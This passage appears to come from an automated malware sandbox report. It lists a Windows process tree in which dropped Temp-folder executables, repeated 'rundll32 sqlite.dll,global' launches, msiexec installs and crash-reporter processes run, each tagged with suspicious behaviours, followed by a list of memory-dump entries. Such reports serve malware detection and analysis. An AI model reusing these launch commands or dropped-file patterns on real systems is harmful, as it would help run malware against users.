                                                                                                                                                                    10⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    PID:5548
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:5040
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                                                                                                                8⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:5680
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:3972
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:5280
                                                                                                                                                • C:\Windows\System32\sihclient.exe
                                                                                                                                                  C:\Windows\System32\sihclient.exe /cv 92GwURs0+UOTl7UTHcO7Cw.0.2
                                                                                                                                                  1⤵
                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                  PID:4980
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1196 -ip 1196
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:4764
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 552 -ip 552
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:4816
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5020 -ip 5020
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  PID:444
                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                  1⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  PID:3868
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 460
                                                                                                                                                    2⤵
                                                                                                                                                    • Program crash
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    PID:5316
                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                  1⤵
                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                  PID:1992
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3692 -ip 3692
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  PID:5064
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3868 -ip 3868
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  PID:1704
                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                  1⤵
                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                  PID:5624
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                    2⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:1096
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 452
                                                                                                                                                      3⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:5616
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 1096 -ip 1096
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  PID:920
                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                  C:\Windows\system32\WerFault.exe -pss -s 580 -p 1436 -ip 1436
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  PID:3636
                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                  C:\Windows\system32\WerFault.exe -pss -s 436 -p 4324 -ip 4324
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  PID:5792
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5756 -ip 5756
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  PID:6016
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5428 -ip 5428
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  PID:568
                                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5384
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                    1⤵
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:4732
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1444 -ip 1444
                                                                                                                                                    1⤵
                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                    PID:3192
                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                    1⤵
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:9700
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2028 -ip 2028
                                                                                                                                                    1⤵
                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                    PID:9848
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                    1⤵
                                                                                                                                                      PID:9912
                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                                      1⤵
                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:10076
                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 8952EA4F7772FDB970B9F5CC45D766BE C
                                                                                                                                                        2⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:5364
                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding D0E9C2FA16C739CBDE0A1CC074F91588
                                                                                                                                                        2⤵
                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:3956
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                          3⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:3236
                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding EEDC8B6A1B5B2D245F15EB69DFFD59AE E Global\MSI0000
                                                                                                                                                        2⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        PID:6464
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3884 -ip 3884
                                                                                                                                                      1⤵
                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                      PID:3820
                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                      1⤵
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      PID:6028
                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                        2⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:6076
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6076 -s 452
                                                                                                                                                          3⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                          PID:2088
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 6076 -ip 6076
                                                                                                                                                      1⤵
                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                      PID:3696

                                                                                                                                                    Network

                                                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                                                    Replay Monitor

                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                    Downloads

                                                                                                                                                    • memory/552-211-0x0000000003F70000-0x0000000004043000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      844KB

                                                                                                                                                    • memory/716-397-0x0000000004EA5000-0x0000000004EA7000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/716-263-0x0000000008640000-0x0000000008641000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/716-250-0x00000000082E0000-0x00000000082E1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/716-215-0x0000000007720000-0x0000000007721000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/716-237-0x00000000076D0000-0x00000000076D1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/716-214-0x0000000004EA2000-0x0000000004EA3000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/716-238-0x0000000007DC0000-0x0000000007DC1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/716-314-0x00000000086E0000-0x00000000086E1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/716-405-0x000000007F4D0000-0x000000007F4D1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/716-208-0x0000000004EA0000-0x0000000004EA1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/716-322-0x0000000008C30000-0x0000000008C31000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/716-233-0x0000000007FE0000-0x0000000007FE1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/716-206-0x0000000004E20000-0x0000000004E21000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/716-243-0x0000000008270000-0x0000000008271000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/716-236-0x00000000071B0000-0x00000000071B1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/884-249-0x0000000001540000-0x0000000001542000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/944-207-0x0000000000850000-0x0000000000866000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      88KB

                                                                                                                                                    • memory/944-198-0x0000000000090000-0x0000000000091000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/944-216-0x000000001ACB0000-0x000000001ACB2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/1000-197-0x0000000000400000-0x000000000046D000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      436KB

                                                                                                                                                    • memory/1196-212-0x0000000002380000-0x0000000002389000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      36KB

                                                                                                                                                    • memory/1204-199-0x0000000000C10000-0x0000000000C11000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/1204-213-0x000000001B920000-0x000000001B922000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/1436-251-0x000000001B540000-0x000000001B542000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/1436-270-0x000000001C170000-0x000000001C171000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/1436-271-0x000000001C870000-0x000000001C871000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/1436-313-0x000000001BFA0000-0x000000001BFA1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/1436-228-0x00000000007A0000-0x00000000007A1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/1436-234-0x0000000002850000-0x000000000288E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      248KB

                                                                                                                                                    • memory/1444-529-0x0000000002D70000-0x000000000368E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      9.1MB

                                                                                                                                                    • memory/1620-548-0x0000000140000000-0x0000000140763000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      7.4MB

                                                                                                                                                    • memory/1620-555-0x00000000020F0000-0x0000000002110000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      128KB

                                                                                                                                                    • memory/1620-558-0x0000000000750000-0x0000000000770000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      128KB

                                                                                                                                                    • memory/1740-209-0x0000000000860000-0x0000000000861000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/2028-537-0x0000000002450000-0x0000000002498000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      288KB

                                                                                                                                                    • memory/2052-450-0x0000000000A90000-0x0000000000A92000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/2376-264-0x000000001B630000-0x000000001B632000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/2376-257-0x0000000000950000-0x0000000000951000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/2572-373-0x0000000005230000-0x0000000005231000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/3216-311-0x0000000000800000-0x0000000000801000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/3688-168-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      100KB

                                                                                                                                                    • memory/3688-167-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      100KB

                                                                                                                                                    • memory/3688-166-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      100KB

                                                                                                                                                    • memory/3688-165-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      100KB

                                                                                                                                                    • memory/3688-164-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      152KB

                                                                                                                                                    • memory/3688-163-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      1.5MB

                                                                                                                                                    • memory/3688-162-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      572KB

                                                                                                                                                    • memory/3692-307-0x0000000002310000-0x0000000002340000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      192KB

                                                                                                                                                    • memory/3796-258-0x00000000014F0000-0x0000000001507000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      92KB

                                                                                                                                                    • memory/3796-261-0x000000001BA50000-0x000000001BA52000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/3796-252-0x0000000000D30000-0x0000000000D31000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4128-278-0x00000000059F0000-0x00000000059F1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4128-260-0x0000000003300000-0x0000000003301000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4128-282-0x0000000001890000-0x0000000001891000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4128-273-0x000000000A4C0000-0x000000000A4C1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4128-268-0x0000000001800000-0x000000000180C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      48KB

                                                                                                                                                    • memory/4128-235-0x0000000000EF0000-0x0000000000EF1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4292-281-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      80KB

                                                                                                                                                    • memory/4324-304-0x00000000011B0000-0x00000000011ED000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      244KB

                                                                                                                                                    • memory/4324-323-0x000000001BA70000-0x000000001BA72000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/4324-293-0x0000000000AB0000-0x0000000000AB1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4736-451-0x00000000035B0000-0x00000000035B2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/4736-244-0x0000000000D80000-0x0000000000D81000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4752-226-0x00000000002F0000-0x00000000002F1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5008-534-0x0000000001090000-0x0000000001092000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/5020-283-0x0000000003C00000-0x0000000003C2F000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      188KB

                                                                                                                                                    • memory/5264-385-0x0000000002580000-0x0000000002581000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5264-339-0x00000000002C0000-0x00000000002C1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5280-335-0x00000000051D0000-0x0000000005456000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      2.5MB

                                                                                                                                                    • memory/5280-318-0x0000000000830000-0x0000000000831000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5300-321-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      80KB

                                                                                                                                                    • memory/5316-447-0x0000000000400000-0x0000000000416000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      88KB

                                                                                                                                                    • memory/5428-330-0x0000000000050000-0x0000000000051000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5428-345-0x0000000004950000-0x0000000004951000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5428-341-0x00000000022B0000-0x00000000022EE000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      248KB

                                                                                                                                                    • memory/5428-336-0x0000000000800000-0x0000000000801000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5464-455-0x0000000001310000-0x0000000001312000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/5464-463-0x0000000001314000-0x0000000001315000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5464-468-0x0000000001316000-0x0000000001317000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5464-469-0x0000000001315000-0x0000000001316000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5548-338-0x0000000000700000-0x0000000000701000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5592-387-0x0000000005AF0000-0x0000000006108000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      6.1MB

                                                                                                                                                    • memory/5756-368-0x0000000005810000-0x0000000005811000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5804-456-0x0000000001310000-0x0000000001312000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/5804-462-0x0000000001312000-0x0000000001314000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/5804-467-0x0000000001315000-0x0000000001317000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/5804-464-0x0000000001314000-0x0000000001315000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5868-389-0x00000000058E0000-0x00000000058E1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6116-449-0x00000000022E0000-0x00000000022E1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/9788-538-0x00000000011E0000-0x00000000011E2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB